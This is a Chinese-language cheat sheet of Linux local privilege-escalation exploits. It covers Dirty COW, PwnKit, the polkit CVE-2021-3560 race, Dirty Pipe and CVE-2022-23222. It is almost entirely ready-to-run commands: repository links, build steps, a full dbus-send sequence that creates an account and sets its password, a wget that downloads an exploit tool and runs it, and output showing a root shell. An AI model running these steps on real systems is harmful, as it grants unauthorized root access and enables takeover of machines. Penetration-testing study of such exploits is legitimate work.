跳转至
Linux脏牛提权
https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty –lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s
CVE-2021-4034
https://github.com/berdav/CVE-2021-4034
只需执行make,./cve-2021-4034然后get root shell
CVE-2021-3560
检查执行命令所需时间
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
提前结束(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
生成密码
>openssl passwd -5 ignite@123
执行(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash获取root
CVE-2022-0847
>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id
或
>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit
CVE-2022-23222
https://github.com/tr3ee/CVE-2022-23222

```bash $ make cc -I include -static -w -o exploit exploit.c $ ./exploit [] phase(⅛) 'create bpf map(s)' running [+] phase(⅛) 'create bpf map(s)' done [] phase(2/8) 'do some leak' running [+] phase(2/8) 'do some leak' done [] phase(⅜) 'prepare arbitrary rw' running [+] phase(⅜) 'prepare arbitrary rw' done [] phase(4/8) 'spawn processes' running [+] phase(4/8) 'spawn processes' done [] phase(⅝) 'find cred (slow)' running [+] phase(⅝) 'find cred (slow)' done [] phase(6/8) 'overwrite cred' running [+] phase(6/8) 'overwrite cred' done [*] phase(⅞) 'spawn root shell' running [+] Enjoy root!

id

uid=0(root) gid=0(root) groups=65534(nobody)

exit

[+] phase(⅞) 'spawn root shell' done [*] phase(8/8) 'clean up the mess' running [+] phase(8/8) 'clean up the mess' done ```